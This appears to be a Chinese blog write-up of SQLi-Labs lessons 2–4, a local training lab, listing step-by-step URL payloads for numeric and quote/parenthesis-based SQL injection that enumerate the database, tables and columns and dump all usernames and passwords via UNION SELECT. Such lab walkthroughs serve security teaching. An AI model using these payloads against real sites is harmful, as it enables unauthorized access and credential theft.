Sqli-Labs:Less2-Less4

Less2-Less4和Less1的查詢語句類似,只是引號及括號的區(qū)別。

Less2

基于錯(cuò)誤_GET_數(shù)字型注入

http://localhost:8088/sqlilabs/Less-2/?id=1
http://localhost:8088/sqlilabs/Less-2/?id=1'
http://localhost:8088/sqlilabs/Less-2/?id=1"

第一條正常,第二、第三條報(bào)錯(cuò):數(shù)字型注入
查詢語句:

select username,password from table_name where id=$_GET['id'] limit 0,1

http://localhost:8088/sqlilabs/Less-2/?id=1 order by 4--+

3個(gè)字段

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,3--+

第2、第3字段

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,concat_ws('-',user(),database())--+

數(shù)據(jù)庫:security

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表名:users

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

字段名:id、username、password

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users--+

END.

Less3

基于錯(cuò)誤_GET_單引號_小括號_字符型注入

http://localhost:8088/sqlilabs/Less-3/?id=1
http://localhost:8088/sqlilabs/Less-3/?id=1'
http://localhost:8088/sqlilabs/Less-3/?id=1"


第一、第三條正常,第二條報(bào)錯(cuò):字符型注入
查詢語句:

select username,password from table_name where id=('$_GET['id']') limit 0,1

http://localhost:8088/sqlilabs/Less-3/?id=1') order by 4--+

3個(gè)字段

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,3--+

第2、第3字段

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,concat_ws('-',user(),database())--+

數(shù)據(jù)庫:security

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表名:users

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

字段名:id、username、password

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users--+

END.

Less4

基于錯(cuò)誤_GET_雙引號_小括號_字符型注入

http://localhost:8088/sqlilabs/Less-4/?id=1
http://localhost:8088/sqlilabs/Less-4/?id=1'
http://localhost:8088/sqlilabs/Less-4/?id=1"


第一、第二條正常,第三條報(bào)錯(cuò):字符型注入
查詢語句:

select username,password from table_name where id=("$_GET['id']") limit 0,1

http://localhost:8088/sqlilabs/Less-4/?id=1") order by 4--+

3個(gè)字段

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,3--+

第2、第3字段

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,concat_ws('-',user(),database())--+

數(shù)據(jù)庫:security

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表名:users

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

字段名:id、username、password

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users--+

END.

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • http://127.0.0.1/sqli-labs-master 淺析MySQL中concat以及group_c...
    BerL1n閱讀 8,779評論 0 4
  • 基于錯(cuò)誤_GET_單引號_字符型注入 在打第一關(guān)的同時(shí)把以前學(xué)的零散的Sqli和Mysql的知識(shí)做個(gè)總結(jié)。參考教程...
    Hyafinthus閱讀 2,231評論 3 11
  • pyspark.sql模塊 模塊上下文 Spark SQL和DataFrames的重要類: pyspark.sql...
    mpro閱讀 9,922評論 0 13
  • web應(yīng)用程序會(huì)對用戶的輸入進(jìn)行驗(yàn)證,過濾其中的一些關(guān)鍵字,這種過濾我們可以試著用下面的方法避開。 1、 不使用被...
    查無此人asdasd閱讀 7,659評論 0 5
  • 當(dāng)電子數(shù)碼產(chǎn)品來襲 是非 兒子開始了解《西游記》這部著作是這假期的事。 緣于這個(gè)暑期語文老師布置作業(yè),假期...
    是非成敗閱讀 251評論 0 1

友情鏈接更多精彩內(nèi)容